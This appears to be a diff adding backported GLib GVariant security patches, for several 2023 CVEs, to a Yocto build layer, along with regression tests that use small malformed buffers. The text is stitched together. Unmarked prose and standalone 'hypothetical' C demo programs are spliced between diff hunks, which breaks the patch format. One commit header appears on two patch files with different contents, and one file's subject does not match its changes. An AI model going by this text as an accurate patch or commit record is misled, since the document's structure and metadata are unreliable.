+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
+ test_normal_checking_array_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
++ test_normal_checking_array_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
+@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
++ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
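With the serialiser change above applied, a serialised container only counts as normal when its framing offsets use the minimal offset size, so oversized offset tables are detected and can be normalised away. As a rough, hypothetical illustration of what that means for calling code (not part of the patch), the following standalone C program feeds 256 zero bytes to g_variant_new_from_data() as an `aay`, mirroring the new array test above:

/* Hypothetical example: compile with
 *   gcc demo.c $(pkg-config --cflags --libs glib-2.0)
 * Mirrors test_normal_checking_array_offsets_minimal_sized() above. */
#include <glib.h>

int
main (void)
{
  guint8 *data = g_malloc0 (256);   /* read as 2-byte offset entries, all zero */
  GVariant *v = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
                                         data, 256, FALSE, g_free, data);
  GVariant *normal = g_variant_get_normal_form (v);

  g_print ("normal? %d, children %u, size %" G_GSIZE_FORMAT "\n",
           g_variant_is_normal_form (v),
           (guint) g_variant_n_children (v),
           g_variant_get_size (v));
  g_print ("after normalisation: size %" G_GSIZE_FORMAT "\n",
           g_variant_get_size (normal));   /* 128 bytes, 1-byte offsets */

  g_variant_unref (normal);
  g_variant_unref (v);
  return 0;
}

A strict consumer could instead reject the input outright when g_variant_is_normal_form() returns FALSE, rather than paying for normalisation.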
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 8 +++++---
+ glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
+ 2 files changed, 29 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 8ba701e..4dbd9e8 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
+ g_variant_serialised_byteswap (serialised);
+
+ bytes = g_bytes_new_take (serialised.data, serialised.size);
+- new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
++ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
+ else
+ /* contains no multi-byte data */
+- new = value;
++ new = g_variant_get_normal_form (value);
+
+- return g_variant_ref_sink (new);
++ g_assert (g_variant_is_trusted (new));
++
++ return g_steal_pointer (&new);
+ }
+
+ /**
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 4ce0e4f..3dda08e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
+ g_free (string);
+ }
+
++static void
++test_gv_byteswap_non_normal_non_aligned (void)
++{
++ const guint8 data[] = { 0x02 };
++ GVariant *v = NULL;
++ GVariant *v_byteswapped = NULL;
++
++ g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
++ "is in non-normal form and doesn’t need byteswapping returns "
++ "the same variant in normal form.");
++
++ v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
++ g_assert_false (g_variant_is_normal_form (v));
++
++ v_byteswapped = g_variant_byteswap (v);
++ g_assert_true (g_variant_is_normal_form (v_byteswapped));
++
++ g_assert_cmpvariant (v, v_byteswapped);
++
++ g_variant_unref (v);
++ g_variant_unref (v_byteswapped);
++}
++
+ static void
+ test_parser (void)
+ {
+@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
+ g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
+ g_test_add_func ("/gvariant/hashing", test_hashing);
+ g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
++ g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
+ g_test_add_func ("/gvariant/parser", test_parses);
+ g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
+ g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
+--
+2.24.4
+
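After this change g_variant_byteswap() always returns data in normal form, even on the path where the input contains no multi-byte values and nothing actually needs swapping. A minimal usage sketch, hypothetical application code mirroring the new test_gv_byteswap_non_normal_non_aligned() test:

/* Hypothetical example mirroring test_gv_byteswap_non_normal_non_aligned(). */
#include <glib.h>

int
main (void)
{
  const guint8 data[] = { 0x02 };   /* non-normal boolean encoding */
  GVariant *v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN,
                                         data, sizeof (data),
                                         FALSE, NULL, NULL);
  GVariant *swapped = g_variant_byteswap (v);

  /* The input is non-normal, the byteswapped result is normal, and both
   * compare equal as values. */
  g_assert (!g_variant_is_normal_form (v));
  g_assert (g_variant_is_normal_form (swapped));
  g_assert (g_variant_equal (v, swapped));

  g_variant_unref (swapped);
  g_variant_unref (v);
  return 0;
}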
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
new file mode 100644
index 0000000000..9167ea624f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 81 +++++++++++++++++++++++++++++++++----------
+ glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
+ 2 files changed, 112 insertions(+), 26 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 4dbd9e8..a80c2c9 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
+
+ /* Serialised data {{{1 */
+ static GVariant *
+-g_variant_deep_copy (GVariant *value)
++g_variant_deep_copy (GVariant *value,
++ gboolean byteswap)
+ {
+ switch (g_variant_classify (value))
+ {
+@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
+ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
+ GVariant *child = g_variant_get_child_value (value, i);
+- g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
++ g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
+ g_variant_unref (child);
+ }
+
+@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
+ return g_variant_new_byte (g_variant_get_byte (value));
+
+ case G_VARIANT_CLASS_INT16:
+- return g_variant_new_int16 (g_variant_get_int16 (value));
++ if (byteswap)
++ return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
++ else
++ return g_variant_new_int16 (g_variant_get_int16 (value));
+
+ case G_VARIANT_CLASS_UINT16:
+- return g_variant_new_uint16 (g_variant_get_uint16 (value));
++ if (byteswap)
++ return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
++ else
++ return g_variant_new_uint16 (g_variant_get_uint16 (value));
+
+ case G_VARIANT_CLASS_INT32:
+- return g_variant_new_int32 (g_variant_get_int32 (value));
++ if (byteswap)
++ return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
++ else
++ return g_variant_new_int32 (g_variant_get_int32 (value));
+
+ case G_VARIANT_CLASS_UINT32:
+- return g_variant_new_uint32 (g_variant_get_uint32 (value));
++ if (byteswap)
++ return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
++ else
++ return g_variant_new_uint32 (g_variant_get_uint32 (value));
+
+ case G_VARIANT_CLASS_INT64:
+- return g_variant_new_int64 (g_variant_get_int64 (value));
++ if (byteswap)
++ return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
++ else
++ return g_variant_new_int64 (g_variant_get_int64 (value));
+
+ case G_VARIANT_CLASS_UINT64:
+- return g_variant_new_uint64 (g_variant_get_uint64 (value));
++ if (byteswap)
++ return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
++ else
++ return g_variant_new_uint64 (g_variant_get_uint64 (value));
+
+ case G_VARIANT_CLASS_HANDLE:
+- return g_variant_new_handle (g_variant_get_handle (value));
++ if (byteswap)
++ return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
++ else
++ return g_variant_new_handle (g_variant_get_handle (value));
+
+ case G_VARIANT_CLASS_DOUBLE:
+- return g_variant_new_double (g_variant_get_double (value));
++ if (byteswap)
++ {
++ /* We have to convert the double to a uint64 here using a union,
++ * because a cast will round it numerically. */
++ union
++ {
++ guint64 u64;
++ gdouble dbl;
++ } u1, u2;
++ u1.dbl = g_variant_get_double (value);
++ u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
++ return g_variant_new_double (u2.dbl);
++ }
++ else
++ return g_variant_new_double (g_variant_get_double (value));
+
+ case G_VARIANT_CLASS_STRING:
+ return g_variant_new_string (g_variant_get_string (value, NULL));
+@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
+ if (g_variant_is_normal_form (value))
+ return g_variant_ref (value);
+
+- trusted = g_variant_deep_copy (value);
++ trusted = g_variant_deep_copy (value, FALSE);
+ g_assert (g_variant_is_trusted (trusted));
+
+ return g_variant_ref_sink (trusted);
+@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
+ * contain multi-byte numeric data. That include strings, booleans,
+ * bytes and containers containing only these things (recursively).
+ *
++ * While this function can safely handle untrusted, non-normal data, it is
++ * recommended to check whether the input is in normal form beforehand, using
++ * g_variant_is_normal_form(), and to reject non-normal inputs if your
++ * application can be strict about what inputs it rejects.
++ *
+ * The returned value is always in normal form and is marked as trusted.
+ *
+ * Returns: (transfer full): the byteswapped form of @value
+@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
+
+ g_variant_type_info_query (type_info, &alignment, NULL);
+
+- if (alignment)
+- /* (potentially) contains multi-byte numeric data */
++ if (alignment && g_variant_is_normal_form (value))
+ {
++ /* (potentially) contains multi-byte numeric data, but is also already in
++ * normal form so we can use a faster byteswapping codepath on the
++ * serialised data */
+ GVariantSerialised serialised = { 0, };
+- GVariant *trusted;
+ GBytes *bytes;
+
+- trusted = g_variant_get_normal_form (value);
+- serialised.type_info = g_variant_get_type_info (trusted);
+- serialised.size = g_variant_get_size (trusted);
++ serialised.type_info = g_variant_get_type_info (value);
++ serialised.size = g_variant_get_size (value);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ serialised.checked_offsets_up_to = G_MAXSIZE;
+- g_variant_store (trusted, serialised.data);
+- g_variant_unref (trusted);
++ g_variant_store (value, serialised.data);
+
+ g_variant_serialised_byteswap (serialised);
+
+@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
+ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
++ else if (alignment)
++ /* (potentially) contains multi-byte numeric data */
++ new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
+ else
+ /* contains no multi-byte data */
+ new = g_variant_get_normal_form (value);
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 3dda08e..679dd40 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one = { 0, }, two = { 0, };
++ GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
+ TreeInstance *tree;
+-
++ GVariant *one_variant = NULL;
++ GVariant *two_variant = NULL;
++ GVariant *two_byteswapped = NULL;
++ GVariant *three_variant = NULL;
++ GVariant *three_byteswapped = NULL;
++ guint8 *three_data_copy = NULL;
++ gsize three_size_copy = 0;
++
++ /* Write a tree out twice, once normally and once byteswapped. */
+ tree = tree_instance_new (NULL, 3);
+ serialise_tree (tree, &one);
+
++ one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
++ one.data, one.size, FALSE, NULL, NULL);
++
+ i_am_writing_byteswapped = TRUE;
+ serialise_tree (tree, &two);
++ serialise_tree (tree, &three);
+ i_am_writing_byteswapped = FALSE;
+
+- g_variant_serialised_byteswap (two);
+-
+- g_assert_cmpmem (one.data, one.size, two.data, two.size);
+- g_assert_cmpuint (one.depth, ==, two.depth);
+-
++ /* Swap the first byteswapped one back using the function we want to test. */
++ two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
++ two.data, two.size, FALSE, NULL, NULL);
++ two_byteswapped = g_variant_byteswap (two_variant);
++
++ /* Make the second byteswapped one non-normal (hopefully), and then byteswap
++ * it back using the function we want to test in its non-normal mode.
++ * This might not work because it’s not necessarily possible to make an
++ * arbitrary random variant non-normal. Adding a single zero byte to the end
++ * often makes something non-normal but still readable. */
++ three_size_copy = three.size + 1;
++ three_data_copy = g_malloc (three_size_copy);
++ memcpy (three_data_copy, three.data, three.size);
++ three_data_copy[three.size] = '\0';
++
++ three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
++ three_data_copy, three_size_copy, FALSE, NULL, NULL);
++ three_byteswapped = g_variant_byteswap (three_variant);
++
++ /* Check they’re the same. We can always compare @one_variant and
++ * @two_byteswapped. We can only compare @two_byteswapped and
++ * @three_byteswapped if @two_variant and @three_variant are equal: in that
++ * case, the corruption to @three_variant was enough to make it non-normal but
++ * not enough to change its value. */
++ g_assert_cmpvariant (one_variant, two_byteswapped);
++
++ if (g_variant_equal (two_variant, three_variant))
++ g_assert_cmpvariant (two_byteswapped, three_byteswapped);
++
++ g_variant_unref (three_byteswapped);
++ g_variant_unref (three_variant);
++ g_variant_unref (two_byteswapped);
++ g_variant_unref (two_variant);
++ g_variant_unref (one_variant);
+ tree_instance_free (tree);
+ g_free (one.data);
+ g_free (two.data);
++ g_free (three.data);
++ g_free (three_data_copy);
+ }
+
+ static void
+--
+2.24.4
+
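One detail worth calling out from the deep-copy path above is how a double is byteswapped: its bits are reinterpreted as a guint64 through a union, because a numeric cast would convert the value rather than swap its bytes. A standalone sketch of that trick (illustrative only, not the patched function itself):

/* Hypothetical standalone illustration of the union trick used in
 * g_variant_deep_copy() above for byteswapping doubles. */
#include <glib.h>

static gdouble
byteswap_double (gdouble in)
{
  union { guint64 u64; gdouble dbl; } u1, u2;

  u1.dbl = in;
  u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);   /* swap the raw bits, not the value */
  return u2.dbl;
}

int
main (void)
{
  gdouble x = 1.5;

  /* Swapping twice must round-trip back to the original bit pattern. */
  g_assert_cmpfloat (byteswap_double (byteswap_double (x)), ==, x);
  return 0;
}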
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
new file mode 100644
index 0000000000..533142b22a
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
+From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:33:49 +0000
+Subject: [PATCH] gvariant: Propagate trust when getting a child of a
+ serialised variant
+
+If a variant is trusted, that means all its children are trusted, so
+ensure that their checked offsets are set as such.
+
+This allows a lot of the offset table checks to be avoided when getting
+children from trusted serialised tuples, which speeds things up.
+
+No unit test is included because this is just a performance fix. If
+there are other slownesses, or regressions, in serialised `GVariant`
+performance, the fuzzing setup will catch them like it did this one.
+
+This change does reduce the time to run the oss-fuzz reproducer from 80s
+to about 0.7s on my machine.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2841
+oss-fuzz#54314
+
+CVE: CVE-2023-32636
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 1b9d5cc..ed57c70 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+- child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+- child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
++ child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
+
+ return child;
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
new file mode 100644
index 0000000000..9c0867bf5f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
+From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:24:43 +0000
+Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
+ bounds
+
+When dereferencing the first entry in the offset table for a tuple,
+check that it doesn’t fall outside the bounds of the variant first.
+
+This prevents an out-of-bounds read from some non-normal tuples.
+
+This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
+
+Includes a unit test, although the test will likely only catch the
+original bug if run with asan enabled.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2840
+oss-fuzz#54302
+
+CVE: CVE-2023-32643
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 12 ++++++--
+ glib/tests/gvariant.c | 63 ++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 72 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 5aa2cbc..4e50ed7 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+
+ member_info = g_variant_type_info_member_info (value.type_info, index_);
+
+- if (member_info->i + 1)
++ if (member_info->i + 1 &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_start = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 1),
+ offset_size);
+@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_start &= member_info->b;
+ member_start |= member_info->c;
+
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_end = value.size - offset_size * (member_info->i + 1);
+
+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_end = member_start + fixed_size;
+ }
+
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
++ offset_size * (member_info->i + 2) <= value.size)
+ member_end = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 2),
+ offset_size);
+
++ else /* invalid */
++ member_end = G_MAXSIZE;
++
+ if (out_member_start != NULL)
+ *out_member_start = member_start;
+ if (out_member_end != NULL)
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 679dd40..2eca8be 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that dereferencing the first element in the offset
++ * table doesn’t dereference memory before the start of the GVariant. The first
++ * element in the offset table gives the offset of the final member in the
++ * tuple (the offset table is stored in reverse), and the position of this final
++ * member is needed to check that none of the tuple members overlap with the
++ * offset table
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
++static void
++test_normal_checking_tuple_offsets5 (void)
++{
++ /* A tuple of type (sss) in normal form would have an offset table with two
++ * entries:
++ * - The first entry (lowest index in the table) gives the offset of the
++ * third `s` in the tuple, as the offset table is reversed compared to the
++ * tuple members.
++ * - The second entry (highest index in the table) gives the offset of the
++ * second `s` in the tuple.
++ * - The offset of the first `s` in the tuple is always 0.
++ *
++ * See §2.5.4 (Structures) of the GVariant specification for details, noting
++ * that the table is only laid out this way because all three members of the
++ * tuple have non-fixed sizes.
++ *
++ * It’s not clear whether the 0xaa data of this variant is part of the strings
++ * in the tuple, or part of the offset table. It doesn’t really matter. This
++ * is a regression test to check that the code to validate the offset table
++ * doesn’t unconditionally try to access the first entry in the offset table
++ * by subtracting the table size from the end of the GVariant data.
++ *
++ * In this non-normal case, that would result in an address off the start of
++ * the GVariant data, and an out-of-bounds read, because the GVariant is one
++ * byte long, but the offset table is calculated as two bytes long (with 1B
++ * sized entries) from the tuple’s type.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
++ const guint8 data[] = { 0xaa };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++
++ expected = g_variant_new_parsed ("('', '', '')");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an otherwise-valid serialised GVariant is considered non-normal if
+ * its offset table entries are too wide.
+ *
+@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
++ test_normal_checking_tuple_offsets5);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
+ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
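The guard added above only dereferences an offset table entry when the whole entry lies inside the serialised data, i.e. when offset_size * (index + 1) <= value.size. A simplified, hypothetical sketch of that check, exercised with the one-byte (sss) case from the new test:

/* Hypothetical simplification of the bounds check added to
 * gvs_tuple_get_member_bounds().  Entry n of the reversed offset table is
 * read from (value.size - offset_size * (n + 1)), so it may only be
 * dereferenced when the whole entry fits inside the serialised data. */
#include <glib.h>

static gboolean
offset_entry_in_bounds (gsize value_size,
                        gsize offset_size,
                        gsize entry_index)
{
  /* The real code relies on offset_size being at most 8 and the entry index
   * being bounded by the tuple's member count, so plain multiplication is
   * safe here. */
  return offset_size * (entry_index + 1) <= value_size;
}

int
main (void)
{
  /* A one-byte (sss) variant, as in test_normal_checking_tuple_offsets5():
   * only the first of its two 1-byte offset table entries fits. */
  g_assert (offset_entry_in_bounds (1, 1, 0));
  g_assert (!offset_entry_in_bounds (1, 1, 1));
  return 0;
}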
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
new file mode 100644
index 0000000000..9fc58341cb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
+ 1 file changed, 25 insertions(+), 24 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9397573..aa0e0a0 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
+ }
+ }
+
++/* < private >
++ * g_variant_to_serialised:
++ * @value: a #GVariant
++ *
++ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
++ */
++inline static GVariantSerialised
++g_variant_to_serialised (GVariant *value)
++{
++ g_assert (value->state & STATE_SERIALISED);
++ {
++ GVariantSerialised serialised = {
++ value->type_info,
++ (gpointer) value->contents.serialised.data,
++ value->size,
++ value->depth,
++ };
++ return serialised;
++ }
++}
++
+ /* < private >
+ * g_variant_serialise:
+ * @value: a #GVariant
+@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
+ g_variant_lock (value);
+
+ if (value->state & STATE_SERIALISED)
+- {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
+-
+- n_children = g_variant_serialised_n_children (serialised);
+- }
++ n_children = g_variant_serialised_n_children (
++ g_variant_to_serialised (value));
+ else
+ n_children = value->contents.tree.n_children;
+
+@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
+ }
+
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
++ GVariantSerialised serialised = g_variant_to_serialised (value);
+ GVariantSerialised s_child;
+ GVariant *child;
+
+@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
+
+ if (value->state & STATE_SERIALISED)
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth
+- };
+-
+- if (g_variant_serialised_is_normal (serialised))
++ if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
+ value->state |= STATE_TRUSTED;
+ }
+ else
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
new file mode 100644
index 0000000000..0e96b8d457
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
